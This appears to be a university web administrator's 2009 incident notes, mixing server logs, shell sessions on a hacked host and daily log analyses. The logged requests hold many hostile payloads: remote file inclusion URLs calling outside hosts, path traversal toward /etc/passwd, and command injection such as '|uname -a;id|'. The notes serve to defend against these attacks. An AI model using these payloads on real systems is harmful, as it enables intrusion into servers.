/organizations/aiaa/lutze/health/canadian- ... acy-cialis.html: 1 Time(s) /organizations/aiaa/lutze/health/canadian- ... agra-legal.html: 1 Time(s) /organizations/aiaa/lutze/health/cialis-en-mexico.html: 1 Time(s) /organizations/aiaa/lutze/health/cialis-ne ... y-delivery.html: 1 Time(s) /organizations/aiaa/lutze/health/cialis-on ... escription.html: 1 Time(s) /organizations/aiaa/lutze/health/cialis-professional.html: 1 Time(s) /organizations/aiaa/lutze/health/cialis-strenght-mg.html: 1 Time(s) /organizations/aiaa/lutze/health/cialis-transdermal.html: 1 Time(s) /organizations/aiaa/lutze/health/how-to-bu ... -in-canada.html: 1 Time(s) /organizations/aiaa/lutze/health/purchase- ... y-delivery.html: 1 Time(s) /organizations/aiaa/lutze/health/purchase-cialis.html: 1 Time(s) /organizations/aiaa/lutze/health/purchasin ... y-delivery.html: 1 Time(s) /organizations/aiaa/lutze/health/viagra-brand.html: 1 Time(s) /organizations/aiaa/lutze/health/viagra-canada-generic.html: 1 Time(s) /organizations/aiaa/lutze/health/viagra-dosage.html: 1 Time(s) /organizations/aiaa/lutze/health/viagra-in-spain.html: 1 Time(s) /organizations/aiaa/lutze/health/viagra-online-deals.html: 1 Time(s) /organizations/aiaa/lutze/health/viagra-pr ... tion-label.html: 1 Time(s) /organizations/aiaa/lutze/health/viagra-sales-canada.html: 1 Time(s) /organizations/aiaa/lutze/health/when-will ... be-generic.html: 1 Time(s) /organizations/aiaa/lutze/health/where-to- ... agra-cheap.html: 1 Time(s) /organizations/aiaa/lutze/health/where-to-buy-cialis.html: 1 Time(s) /organizations/errors.php?error=http://hom ... s/kampret.jpg??: 1 Time(s) /organizations/vtsgt/gallery/add_comment.p ... lery_popup=true: 3 Time(s) /research/?area_id=2: 1 Time(s) /research/?area_id=3: 4 Time(s) /research/?area_id=6: 1 Time(s) /research/thesis: 3 Time(s) /research/thesis/?mode=area_selected&thesis_area=1: 1 Time(s) /research/thesis/?mode=area_selected&thesis_area=2: 2 Time(s) /research/thesis/index.php: 1 Time(s) /research/thesis?PHPSESSID=6d7a4053baa4341ecb12f59c3e96713e: 1 Time(s) /research/thesis?PHPSESSID=84e12d3ca0c34b1db03f42dede788a6a: 1 Time(s) /~amir/: 1 Time(s) /~balabanv/Meetings/hpccp.wksh.97.ps: 1 Time(s) /~brown/Papers//source/mod/rss/view.php?Co ... ./../etc/passwd: 1 Time(s) /~brown/Papers/source/mod/rss/view.php?Cod ... w.rabika.ru/hk?: 1 Time(s) /~brown/VTShipDesign/VTDesignforAffordabil ... es/editdata.mso: 1 Time(s) /~brown/VTShipDesign/VTShipDesign_files/editdata.mso: 2 Time(s) /~brown/VTShipDesign/errors.php?error=http ... s/kampret.jpg??: 1 Time(s) /~brown/errors.php?error=http://home.coven ... s/kampret.jpg??: 1 Time(s) /~cdhall/MyMaps/Usage%20&%20FAQ.txt//?file ... ips_w/id.txt???: 1 Time(s) /~cliff/aoe5244/aoe5244.html: 1 Time(s) /~cliff/aoe5244/proj_lagr.pdf: 1 Time(s) /~cliff/aoe5244/quad_eg.m: 1 Time(s) /~cwoolsey//ee_commerce/paypalcart.php?tor ... pyright.txt????: 1 Time(s) /~cwoolsey/Advisees//ee_commerce/paypalcar ... pyright.txt????: 1 Time(s) /~cwoolsey/Advisees/Undergraduate//ee_comm ... pyright.txt????: 1 Time(s) /~cwoolsey/Advisees/Undergraduate/FaruqueA ... pyright.txt????: 2 Time(s) /~cwoolsey/Courses/AOE3134/(null): 1 Time(s) /~devenpor/aoe3054/(null): 1 Time(s) /~grasmeye/bkmk.html: 1 Time(s) /~grasmeye/photos/allison/: 1 Time(s) /~grasmeye/photos/allison/billstory.html: 1 Time(s) /~grasmeye/photos/hotsprings: 1 Time(s) /~grasmeye/photos/hotsprings/: 1 Time(s) /~grasmeye/photos/index.html: 2 Time(s) /~grasmeye/photos/mexico/: 1 Time(s) /~hokiesat/subs/wiring//include/admin.lib. ... igen/.../ids???: 1 Time(s) /~hokiesat/subs/wiring/New%20Stuff//includ ... igen/.../ids???: 1 Time(s) /~jing/MohrCircle.html&ei=o40KSpeLG4mqtgeC ... SwUj1hKfdf6I2cQ: 1 Time(s) /~jkuhn/: 3 Time(s) /~jkuhn/office2003.tar/: 1 Time(s) /~lutze/AOE4134/7MissionAnalysis.pdf/?_SER ... /upload/ec.txt?: 1 Time(s) /~lutze/AOE4134/patchedconiceqs.pdf/?_SERV ... /bajocdm2.txt??: 1 Time(s) /~lutze/AOE4134/patchedconiceqs.pdf/?_SERV ... /upload/ec.txt?: 6 Time(s) /~lutze/AOE4134/patchedconiceqs.pdf/?_SERV ... ote_log/ec.txt?: 2 Time(s) /~mason/Mason_f//source/mod/rss/view.php?C ... ./../etc/passwd: 1 Time(s) /~mason/Mason_f/source/mod/rss/view.php?Co ... w.rabika.ru/hk?: 1 Time(s) /~mason/Mason_f/www.avweb.com/news/reviews/182564-1.html: 1 Time(s) /~simpson/PDFMedia029559/e/0: 1 Time(s) /~simpson/PDFMedia029559/e/1: 1 Time(s) /~simpson/aoe4154/(null): 1 Time(s) /~specs-a: 1 Time(s) /~teamga/: 1 Time(s) /~tether-a: 1 Time(s) /~walters/AOE6145: 1 Time(s) /~wang/: 1 Time(s) /~wang/heat: 3 Time(s) /~wang/robots.txt: 1 Time(s) 405 Method Not Allowed /~hokiesat/: 1 Time(s) /~mason/: 12 Time(s) 416 Request Range Not Satisfiable /~mason/Mason_f/DBF/hpa_compilation.wmv: 1 Time(s) /~mason/Mason_f/VTechT1Gavial.pdf: 2 Time(s) Today this was found in research: [root@bacchus research]# ls -Fla total 132 drwxrwsr-x 7 apache web-admin 4096 May 4 09:39 ./ drwxrwsr-x 26 apache web-admin 4096 Apr 15 13:21 ../ -rw-r--r-- 1 apache web-admin 378 May 4 09:39 15.php [root@bacchus research]# cat 15.php No .htaccess file was in healthcenter 195.151.216.49 - admin [04/May/2009:09:35:57 -0400] "POST /prospective/sitemap.php HTTP/1.0" 200 55416 131.107.155.228 - - [04/May/2009:09:36:00 -0400] "GET /~cdhall/Space/ HTTP/1.1" 200 72971 195.151.216.49 - admin [04/May/2009:09:36:00 -0400] "POST /prospective/sitemap.php HTTP/1.0" 200 41075 195.151.216.49 - admin [04/May/2009:09:36:08 -0400] "POST /prospective/sitemap.php HTTP/1.0" 200 16614 61.135.216.104 - - [04/May/2009:09:36:11 -0400] "GET /~cdhall/Space/index.rdf HTTP/1.1" 200 10220 198.82.16.13 - - [04/May/2009:09:36:13 -0400] "GET /~aborgolt/aoe3054/classes/Class%204%20-%20Analog%20Instrumentation%20-%202009-02-09.pdf HTTP/1.1" 200 808664 198.82.16.13 - - [04/May/2009:09:36:13 -0400] "GET /~aborgolt/aoe3054/classes/Class%204%20-%20Analog%20Instrumentation%20-%202009-02-09.pdf HTTP/1.1" 206 748477 195.151.216.49 - admin [04/May/2009:09:36:14 -0400] "POST /prospective/sitemap.php HTTP/1.0" 200 17045 66.235.124.59 - - [04/May/2009:09:36:17 -0400] "GET /%7Ekapania/StructuresPrelim/ HTTP/1.0" 200 11835 195.151.216.49 - admin [04/May/2009:09:36:18 -0400] "GET /prospective/sitemap.php HTTP/1.0" 200 22649 204.111.158.56 - - [04/May/2009:09:36:37 -0400] "GET /~aborgolt/aoe3054/classes/Class%206%20-%20Dynamic%20Response%20-%202009-02-23.pdf HTTP/1.1" 200 667923 195.151.216.49 - - [04/May/2009:09:36:38 -0400] "GET /alumni/15.php HTTP/1.0" 200 384 [root@bacchus www]# find /mnt/lacie/bacchus-hacked/ -iname sitemap.php /mnt/lacie/bacchus-hacked/www/aoe-html/prospective/sitemap.php /mnt/lacie/bacchus-hacked/www/aoe-html/sitemap.php /mnt/lacie/bacchus-hacked/www/sssl-html/simplePHPblogOld/sitemap.php [root@bacchus aoe-html]# ls -Fla /mnt/lacie/bacchus-hacked/www/aoe-html/prospective/ total 244 drwxrwsr-x 2 apache web-admin 4096 May 4 09:52 ./ drwxrwsr-x 26 apache web-admin 4096 Apr 15 13:21 ../ -rw-r--r-- 1 apache web-admin 147623 May 4 09:52 1.zip -rwxrwxr-x 1 mkapania web-admin 3059 Sep 1 2008 index.php* -rwxrwxr-x 1 mkapania web-admin 3053 Aug 7 2008 index.php~* -rw-r--r-- 1 lscharf web-admin 207 Jun 10 2005 sitemap.dat -rw-r--r-- 1 apache web-admin 44293 Apr 26 16:48 sitemap.php 74.6.17.174 - - [26/Apr/2009:16:00:18 -0400] "GET /pics/weeki2008/Weeki%20Wachi/slides/DSC_0074.html HTTP/1.0" 200 10701 67.195.111.186 - - [26/Apr/2009:16:01:15 -0400] "GET /vids/thumbs/?p=no-1-online-viagra HTTP/1.0" 200 6244 67.195.111.186 - - [26/Apr/2009:16:01:58 -0400] "GET /vids/thumbs/?p=daily-cialis-online HTTP/1.0" 200 6764 74.6.17.174 - - [26/Apr/2009:16:10:45 -0400] "GET /pics/weeki2007/Weeki_Wachee/3_Welcome_to_Weeki_Wachee/slides/IMG_0383.html HTTP/1.0" 200 9329 74.6.17.174 - - [26/Apr/2009:16:11:08 -0400] "GET /pics/weeki2008/Weeki%20Wachi/slides/DSC_0024.html HTTP/1.0" 200 10703 173.5.177.60 - - [26/Apr/2009:16:14:44 -0400] "GET /vids/thumbs/?p=cialis-1-a-day HTTP/1.1" 200 6681 173.5.177.60 - - [26/Apr/2009:16:14:44 -0400] "GET /vids/thumbs/script.js HTTP/1.1" 404 - 173.5.177.60 - - [26/Apr/2009:16:14:44 -0400] "GET /favicon.ico HTTP/1.1" 404 - 74.6.17.174 - - [26/Apr/2009:16:15:36 -0400] "GET /pics/weeki2007/5_The_Event/slides/100_0266.html HTTP/1.0" 200 9116 74.6.17.174 - - [26/Apr/2009:16:15:36 -0400] "GET /pics/weeki2007/res/styles.css HTTP/1.0" 304 - 65.55.208.216 - - [26/Apr/2009:16:16:34 -0400] "GET /html/pics4.html HTTP/1.1" 200 3234 74.6.17.174 - - [26/Apr/2009:16:16:35 -0400] "GET /pics/weeki2007/8_Underwater_2/slides/FH000029.html HTTP/1.0" 200 8766 67.195.111.186 - - [26/Apr/2009:16:16:39 -0400] "GET /vids/thumbs/?p=cheap-soft-cialis HTTP/1.0" 200 6898 95.52.81.134 - - [26/Apr/2009:16:18:38 -0400] "GET /pics/weeki2008/Sailing/thumbs/DSC_0096.php HTTP/1.1" 200 6688 74.6.17.174 - - [26/Apr/2009:16:19:17 -0400] "GET /np/2108.html HTTP/1.0" 304 - 95.52.81.134 - - [26/Apr/2009:16:19:23 -0400] "POST /pics/weeki2008/Sailing/thumbs/DSC_0096.php HTTP/1.1" 200 5975 95.52.81.134 - - [26/Apr/2009:16:19:28 -0400] "POST /pics/weeki2008/Sailing/thumbs/DSC_0096.php HTTP/1.1" 200 4203 95.52.81.134 - - [26/Apr/2009:16:19:30 -0400] "POST /pics/weeki2008/Sailing/thumbs/DSC_0096.php HTTP/1.1" 200 6014 95.52.81.134 - - [26/Apr/2009:16:19:34 -0400] "POST /pics/weeki2008/Sailing/thumbs/DSC_0096.php HTTP/1.1" 200 8628 95.52.81.134 - - [26/Apr/2009:16:19:37 -0400] "POST /pics/weeki2008/Sailing/thumbs/DSC_0096.php HTTP/1.1" 200 3744 95.52.81.134 - - [26/Apr/2009:16:19:38 -0400] "POST /pics/weeki2008/Sailing/thumbs/DSC_0096.php HTTP/1.1" 200 29237 95.52.81.134 - - [26/Apr/2009:16:19:52 -0400] "POST /pics/weeki2008/Sailing/thumbs/DSC_0096.php HTTP/1.1" 200 3288 95.52.81.134 - - [26/Apr/2009:16:19:59 -0400] "POST /pics/weeki2008/Sailing/thumbs/DSC_0096.php HTTP/1.1" 200 29237 ... copied to sitemap.b64 cp -a sitemap.php sitemap.b64 remove all except the base64 data with vim -b sitemap.b64 openssl enc -d -base64 -a -A -in sitemap.b64 -out sitemap.gz ??? now what??? [root@bacchus functions]# pwd /mnt/lacie/bacchus-mar12009/www/aoe-html/calendars/phpical/functions [root@bacchus functions]# ls -Fla total 228 drwxrwsr-x 2 apache web-admin 4096 Jul 14 2003 ./ drwxrwsr-x 8 apache web-admin 4096 Jul 14 2003 ../ -rw-r--r-- 1 root web-admin 1515 Jul 14 2003 date_add.php -rw-r--r-- 1 root web-admin 5417 Jul 14 2003 date_functions.php -rw-r--r-- 1 root web-admin 1640 Jul 14 2003 draw_functions.php -rw-r--r-- 1 root web-admin 2652 Jul 14 2003 error.php -rw-rw-r-- 1 apache web-admin 451 Oct 2 2002 event.js -rw-r--r-- 1 root web-admin 27467 Jul 14 2003 ical_parser.php -rw-r--r-- 1 root web-admin 3554 Jul 14 2003 init.inc.php -rw-r--r-- 1 root web-admin 1954 Jul 14 2003 list_icals.php -rw-r--r-- 1 apache web-admin 44333 Jul 14 2003 list_inc.php -rw-r--r-- 1 root web-admin 817 Jul 14 2003 list_months.php -rw-r--r-- 1 root web-admin 1248 Jul 14 2003 list_weeks.php -rw-r--r-- 1 root web-admin 1129 Jul 14 2003 list_years.php -rw-r--r-- 1 root web-admin 9903 Jul 14 2003 overlapping_events.php -rw-r--r-- 1 root web-admin 26810 Jul 14 2003 timezones.php www2 was created around this date drwxr-xr-x 2 root root 4096 Oct 17 2008 www/ and event.js and list_inc.php files exist. They were likely deleted on this date: drwxrwsr-x 2 apache web-admin 4096 Apr 26 16:30 functions/ =====May 14, 2009 Log Analysis===== May 14th Log Analysis (Bacchus) =============================== //?page=../../../../../../../../../../../../../etc/passwd%00 HTTP Response 200 A failed attempt to read the passwd file, just redirected to home page /index.php?inc=../../../../../../../../../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP Response 200 Another failed attempt, just went to the home page null HTTP Response 200 This is generated by IE 7 requesting an unavailable resource. Does no damage (and doesnt happen in Firefox) //include/print_category.php?setup[use_cat ... ve.com/id.txt??: 2 Time(s) Checking on this one right now, will come back to it later. /alumni/alumnilist.php?class=http://193.12 ... 666/index.html?: 2 Time(s) Need to add an input verification script on this file. It will guarantee this access fails. /computing/faq/displayfaq.php?area_id=http ... 666/index.html?: 3 Time(s) Coming from Amsterdam, probably need an input verifier on this page as well. /hall.php?page=http://darkn3st.fileave.com/fx29id.txt?: 1 Time(s) /hall.php?page=http://www.ladyboss.com.ua/fx29id2.txt???: 2 Time(s) No file called hall.php, there is a randolph_hall.php but it looks secure, takes no parameters /photo_comment.php?toroot=http://www.reeft ... a/index/bo.do??: 2 Time(s) I can't find a file called photo_comment.php, but if it exists it should probably have an input verifier on it. /~cdhall/courses/AUAE/styles_sniffer.js: 1 Time(s) Can't find the file...not sure about this one. http://88.80.7.248/pp/anp.php?a=UV%5CHWQBY ... U&b=1155&c=b870: 1 Time(s) Traces to a site in sweden called fast-medications.net... =====May 16, 2009 Log Analysis===== 404's //ee_commerce/paypalcart.php?toroot=http:/ ... MADONGCMD.txt??: 3 Time(s) //include/admin.lib.inc.php?site_path=http ... s/93/yes.txt???: 1 Time(s) //include/print_category.php?setup[use_cat ... wap.sh/id.txt??: 2 Time(s) //photo_comment.php?toroot=http://www.trit ... m/2009/id.txt??: 1 Time(s) /MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6211 ... MVER=4&CAPREQ=0: 1 Time(s) /MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6254 ... MVER=4&CAPREQ=0: 3 Time(s) /MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=8164 ... MVER=4&CAPREQ=0: 1 Time(s) /Papers/ASNE2002Paper.pdf: 1 Time(s) /Space/archives/000786.html: 4 Time(s) /_vti_bin/_vti_aut/author.dll: 1 Time(s) /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6211 ... MVER=4&CAPREQ=0: 1 Time(s) /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=6254 ... MVER=4&CAPREQ=0: 3 Time(s) /_vti_bin/owssvr.dll?UL=1&ACT=4&BUILD=8164 ... MVER=4&CAPREQ=0: 1 Time(s) /_vti_bin/shtml.exe/_vti_rpc: 4 Time(s) /_vti_inf.html: 4 Time(s) /awstats.pl?configdir=%7Cecho%20;echo%20;i ... o%20;echo%20%7C: 1 Time(s) /cgi-bin/MachineInfo/cgi-bin/wrap/gurdal/: 1 Time(s) /cgi-bin/acart/acart.pl?&page=%7Cuname%20-a;pwd;id%7C: 1 Time(s) /cgi-bin/awstats.pl?configdir=%7Cecho%20;e ... o%20;echo%20%7C: 1 Time(s) /cgi-bin/index.cgi?page=%7Cuname%20-a;id%7C: 1 Time(s) /cgi-bin/kerbynet?Section=NoAuthREQ&Action ... ype=*%22;id;%22: 1 Time(s) /cgi-bin/mt/mt-comments.cgi: 2 Time(s) /cgi-bin/mt/mt-comments.cgi?entry_id=1330: 1 Time(s) /cgi-bin/mt/mt-comments.cgi?entry_id=449: 1 Time(s) /cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1134: 1 Time(s) /cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1329: 1 Time(s) /cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1330: 1 Time(s) /cgi-bin/news.cgi?id=%7Cid%7C: 1 Time(s) /cgi-bin/quikstore.cgi?category=%7Cid%7C: 1 Time(s) /cgi-bin/shop.pl/page=%7Cid%7C: 1 Time(s) /cgi-sys/guestbook.cgi?user=cpanel&template=%7Cid%7C: 1 Time(s) /computing/faq/displayfaq.php?area_id=5: 1 Time(s) /main.cgi/file.txt?down_num=953713356&boar ... ile.txt%7Cid%7C: 1 Time(s) /organizations/aiaa/gallery/gallery1/0708officers.JPG: 1 Time(s) /organizations/aiaa/gallery/gallery1/officer2008.jpg: 1 Time(s) /organizations/aiaa/gallery/gallery2/01-0412080919.jpg: 1 Time(s) /organizations/aiaa/gallery/index.php?gal=3&pic=2: 1 Time(s) /organizations/aiaa/gallery/index.php?gal=4&pic=1: 1 Time(s) /organizations/aiaa/gallery/index.php?gal=4&pic=10: 1 Time(s) /organizations/aiaa/gallery/index.php?gal=4&pic=11: 1 Time(s) /organizations/aiaa/index.php?go=calendar: 1 Time(s) /organizations/aiaa/index.php?go=contacts: 2 Time(s) /organizations/aiaa/index.php?go=links: 1 Time(s) /organizations/aiaa/index.php?go=whatwedo: 2 Time(s) /organizations/index.php?inc=http://indoir ... o/idscan.txt???: 1 Time(s) /organizations/vtsgt/gallery/add_comment.p ... lery_popup=true: 1 Time(s) /organizations/vtsgt/index.php?inc=http:// ... o/idscan.txt???: 1 Time(s) /research/thesis/?mode=area_selected&thesis_area=1: 1 Time(s) /research/thesis/?mode=area_selected&thesis_area=2: 1 Time(s) /research/thesis/?mode=area_selected&thesis_area=4: 2 Time(s) /saffairs/pages/r/?Trans-union-free-credit-report-1/: 1 Time(s) /search.php: 14 Time(s) /services/help/?show=about&module=;%22.passthru(%22id%22);: 1 Time(s) /shop.pl/page=%7Cid%7C: 1 Time(s) /skin_shop/standard/3_plugin_twindow/twind ... /scripts/test??: 1 Time(s) /technote/main.cgi/file.txt?down_num=95371 ... ile.txt%7Cid%7C: 1 Time(s) /twiki/bin/configure?action=image;image=%7Cid%7C;type=text: 1 Time(s) /undergraduate: 1 Time(s) /~cwoolsey//photo_comment.php?toroot=http: ... m/2009/id.txt??: 1 Time(s) /~cwoolsey/Advisees//photo_comment.php?tor ... m/2009/id.txt??: 1 Time(s) /~cwoolsey/Advisees/Undergraduate//ee_comm ... MADONGCMD.txt??: 3 Time(s) /~cwoolsey/Advisees/Undergraduate//photo_c ... m/2009/id.txt??: 1 Time(s) /~cwoolsey/Advisees/Undergraduate/FaruqueA ... MADONGCMD.txt??: 3 Time(s) /~cwoolsey/Advisees/Undergraduate/FaruqueA ... m/2009/id.txt??: 1 Time(s) /~hokiesat/subs/wiring//include/admin.lib. ... s/93/yes.txt???: 1 Time(s) /~hokiesat/subs/wiring/New%20Stuff//includ ... s/93/yes.txt???: 1 Time(s) /~lscharf/scripts/homepages.php.txt%20%20/ ... br/fx29id.txt??: 1 Time(s) /~lscharf/scripts/homepages.php.txt%20%20/ ... t/fx29id1.txt??: 1 Time(s) /~mason//include/print_category.php?setup[ ... wap.sh/id.txt??: 2 Time(s) /~mason//photo_comment.php?toroot=http://w ... m/2009/id.txt??: 1 Time(s) /~mason/Mason/http%20://www.aoe.vt.edu/~ma ... /ACinfoTOC.html: 1 Time(s) /~mason/Mason_f//ee_commerce/paypalcart.ph ... MADONGCMD.txt??: 1 Time(s) /~mason/Mason_f//include/print_category.ph ... wap.sh/id.txt??: 2 Time(s) /~mason/Mason_f//photo_comment.php?toroot= ... m/2009/id.txt??: 1 Time(s) /~mason/Mason_f/747CONF.INP//include/print ... wap.sh/id.txt??: 2 Time(s) /~mason/Mason_f/M96SAE.pdf//include/print_ ... wap.sh/id.txt??: 1 Time(s) /~mason/Mason_f/MorphFinalRptF03.pdf%20%20 ... m/2009/id.txt??: 1 Time(s) /~mason/Mason_f/MorphFinalRptF03.pdf//ee_c ... MADONGCMD.txt??: 1 Time(s) /~mason/Mason_f/favicon.ico: 4 Time(s) /~mason/Mason_f/skin_shop/standard/3_plugi ... /scripts/test??: 1 Time(s) http://www.aoe.vt.edu/~devenpor/aoe5104/2% ... 2520Algebra.pdf: 1 Time(s) 405 Method Not Allowed /~cdhall/: 1 Time(s) /~hokiesat/: 6 Time(s) /~mason/: 3 Time(s) =====May 17, 2009 Log Analysis===== A total of 2 sites probed the server 132.205.95.71 174.35.250.57 404's //assets/snippets/reflect/snippet.reflect. ... /scripts/test??: 1 Time(s) //components/com_extcalendar/errors.php?er ... s/kampret.jpg??: 1 Time(s) //include/print_category.php?setup[use_cat ... wap.sh/id.txt??: 2 Time(s) //skin/zero_vote/setup.php?%20dir=http://d ... wap.sh/id.txt??: 3 Time(s) /3DLDV/wb23000/data.html: 1 Time(s) /alumni/alumnilist.php?class=http://owned- ... luelinebe.html?: 3 Time(s) /cgi-bin/mt/mt-comments.cgi: 2 Time(s) /cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1331: 1 Time(s) /computing/faq/displayfaq.php?area_id=3: 2 Time(s) /computing/faq/displayfaq.php?area_id=4: 1 Time(s) /organizations/aiaa/show_news.php?cutepath ... og/fx29id.txt??: 1 Time(s) /organizations/show_news.php?cutepath=http ... og/fx29id.txt??: 1 Time(s) /show_news.php?cutepath=http://212.227.74. ... og/fx29id.txt??: 1 Time(s) /~mason//include/print_category.php?setup[ ... wap.sh/id.txt??: 2 Time(s) /~mason//skin/zero_vote/setup.php?%20dir=h ... wap.sh/id.txt??: 3 Time(s) /~mason/Mason/ACiX29.htmlects/s37/index.ht ... tml\x9f\xfe\xff: 1 Time(s) /~mason/Mason/http%20://www.aoe.vt.edu/~ma ... /ACinfoTOC.html: 1 Time(s) /~mason/Mason_f//assets/snippets/reflect/s ... /scripts/test??: 1 Time(s) /~mason/Mason_f//include/print_category.ph ... wap.sh/id.txt??: 2 Time(s) /~mason/Mason_f//skin/zero_vote/setup.php? ... wap.sh/id.txt??: 3 Time(s) /~mason/Mason_f/747CONF.INP//include/print ... wap.sh/id.txt??: 2 Time(s) /~mason/Mason_f/747CONF.INP//skin/zero_vot ... wap.sh/id.txt??: 2 Time(s) /~mason/Mason_f/M96SAE.pdf//include/print_ ... wap.sh/id.txt??: 1 Time(s) /~mason/Mason_f/M96SAE.pdf//skin/zero_vote ... wap.sh/id.txt??: 3 Time(s) =====May 18, 2009 Log Analysis===== A total of 8 sites probed the server 189.8.13.18 208.94.173.99 217.218.82.15 58.214.162.140 79.233.147.7 80.191.127.196 82.19.44.18 94.169.92.137 403's /research/: 13 Time(s) /research/?area_id=1: 2 Time(s) /research/?area_id=2: 3 Time(s) /research/?area_id=3: 1 Time(s) /research/?area_id=4: 1 Time(s) /research/?area_id=5: 1 Time(s) /research/?area_id=6: 1 Time(s) 404's /%7Eciochett/lit/zen.html: 1 Time(s) /%7Emason/Mason_f/errors.php?error=http:// ... hu/buggsbunny??: 1 Time(s) /%7Emason/Mason_f/source/mod/rss/viewitem. ... hu/buggsbunny??: 1 Time(s) /%7Emason/Mason_f/source/mod/rss/viewitem. ... oc/self/environ: 1 Time(s) /%7Emason/Mason_f/source/mod/rss/viewitem. ... self/environ%00: 1 Time(s) /%7Emason/errors.php?error=http://www.fmf2 ... hu/buggsbunny??: 1 Time(s) /%7Emason/source/mod/rss/viewitem.php?Code ... hu/buggsbunny??: 1 Time(s) /%7Emason/source/mod/rss/viewitem.php?Code ... oc/self/environ: 1 Time(s) /%7Emason/source/mod/rss/viewitem.php?Code ... self/environ%00: 1 Time(s) /MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=8164 ... MVER=4&CAPREQ=0: 1 Time(s) /\xef\xbd\x9emason/Mason_f/icase_paper95.pdf: 1 Time(s) /alumni/news.php?gashar=GASHAR&back_eval=p ... =SBD_MAKE_VOICE: 1 Time(s) /cart.php?category_id=': 2 Time(s) /cgi-bin/mt/mt-comments.cgi: 2 Time(s) /cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1331: 1 Time(s) /display.php?pg=http://www.5d-gaming.org/b/iid.txt??: 1 Time(s) /errors.php?error=http://www.fmf2004.hu/buggsbunny??: 1 Time(s) /ferror.txt: 1 Time(s) /forum/index.php: 1 Time(s) /forums/index.php: 1 Time(s) /news.php?_SERVER[DOCUMENT_ROOT]=http://ww ... ote_log/ec.txt?: 2 Time(s) /organizations/aiaa/index.php?go=../../../ ... ./../etc/passwd: 1 Time(s) /organizations/aiaa/index.php?go=../../../ ... ./etc/passwd%00: 2 Time(s) /organizations/aiaa/index.php?go=contacts: 2 Time(s) /organizations/aiaa/index.php?go=links: 1 Time(s) /organizations/aiaa/index.php?go=whatwedo: 1 Time(s) /organizations/aiaa/index.php?start_from=2 ... subaction=&id=&: 1 Time(s) /organizations/sname/ingalls02pics/plas%25 ... 2520cutting.jpg: 2 Time(s) /organizations/sname/ingalls02pics/plate%2 ... las%2520arc.jpg: 2 Time(s) /organizations/sname/ingalls02pics2.html&h ... hl=en&start=408: 1 Time(s) /organizations/sname/ingalls02pics2.html&h ... hl=en&start=409: 1 Time(s) /organizations/sname/ingalls02pics2.html&h ... hl=en&start=413: 1 Time(s) /organizations/sname/ingalls02pics2.html&h ... hl=en&start=414: 1 Time(s) /organizations/sname/ingalls02pics2.html&h ... hl=en&start=419: 1 Time(s) /organizations/sname/ingalls02pics2.html&h ... hl=en&start=420: 1 Time(s) /organizations/sname/ingalls02pics2.html&h ... hl=en&start=421: 1 Time(s) /organizations/sname/ingalls02pics2.html&h ... hl=en&start=422: 1 Time(s) /organizations/sname/ingalls02pics2.html&h ... hl=en&start=424: 1 Time(s) /organizations/sname/ingalls02pics2.html&h ... hl=en&start=425: 1 Time(s) /organizations/sname/ingalls02pics2.html&h ... hl=en&start=426: 1 Time(s) /organizations/sname/ingalls02pics2.html&h ... hl=en&start=427: 2 Time(s) /organizations/sname/ingalls02pics2.html&h ... hl=en&start=428: 2 Time(s) /organizations/sname/ingalls02pics2.html&h ... hl=en&start=429: 1 Time(s) /organizations/sname/ingalls02pics2.html&h ... hl=en&start=480: 1 Time(s) /source/mod/rss/viewitem.php?Codebase=../. ... oc/self/environ: 1 Time(s) /source/mod/rss/viewitem.php?Codebase=../. ... self/environ%00: 1 Time(s) /source/mod/rss/viewitem.php?Codebase=http ... hu/buggsbunny??: 1 Time(s) /~dare/me/punk/rocker.html: 1 Time(s) /~elseifi: 1 Time(s) /~grasmeye/photos/allison/: 2 Time(s) /~grasmeye/photos/allison/billstory.html: 1 Time(s) /~grasmeye/photos/index.html: 2 Time(s) 405 Method Not Allowed /ferror.txt: 1 Time(s) /~hokiesat/: 1 Time(s) /~mason/: 1 Time(s) 416 Request Range Not Satisfiable /~kashin/courses/aoe4065/Files/SystemAnalysis.pdf: 1 Time(s) =====May 19, 2009 Log Analysis===== A total of 7 sites probed the server 121.246.105.26 140.159.2.32 141.212.51.1 59.180.142.136 76.4.48.141 90.215.231.235 91.212.16.8 400 Bad Request www.aoe.vt.edu/news/news.php?gashar=GASHAR ... =SBD_MAKE_VOICE: 1 Time(s) 404's ///google.ro/path=http://208.98.22.241/id.txt????: 1 Time(s) //bemarket/postscript/postscript.php?p_mod ... load/pw.txt????: 1 Time(s) //board/board.php?code=http://163.26.12.232/gambar.jpg???: 1 Time(s) /MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6211 ... MVER=4&CAPREQ=0: 1 Time(s) /MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=6551 ... MVER=4&CAPREQ=0: 1 Time(s) /MSOffice/cltreq.asp?UL=1&ACT=4&BUILD=8164 ... MVER=4&CAPREQ=0: 2 Time(s) /calendars/phpScheduleIt/reserve.php: 1 Time(s) /calendars/phpScheduleIt/roschedule.php?da ... 008&scheduleid=: 1 Time(s) /cgi-bin/mt/mt-comments.cgi: 4 Time(s) /cgi-bin/mt/mt-comments.cgi?entry_id=1330: 1 Time(s) /cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1134: 1 Time(s) /cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1329: 1 Time(s) /cgi-bin/mt/mt-tb.cgi?__mode=view&entry_id=1331: 1 Time(s) /people//board/board.php?code=http://163.2 ... 2/gambar.jpg???: 1 Time(s) /~cwoolsey/Courses/AOE3134/Supplemental/// ... .241/id.txt????: 1 Time(s) /~cwoolsey/Courses/AOE3134/Supplemental/Ro ... .241/id.txt????: 1 Time(s) /~gaylord//bemarket/postscript/postscript. ... load/pw.txt????: 1 Time(s) /~gaylord/ps.to.eps.html//bemarket/postscr ... load/pw.txt????: 1 Time(s) =====May 20, 2009 Log Analysis===== A total of 4 sites probed the server 143.248.72.100 205.243.148.151 67.19.50.178 90.55.42.112 A total of 3 possible successful probes were detected (the following URLs contain 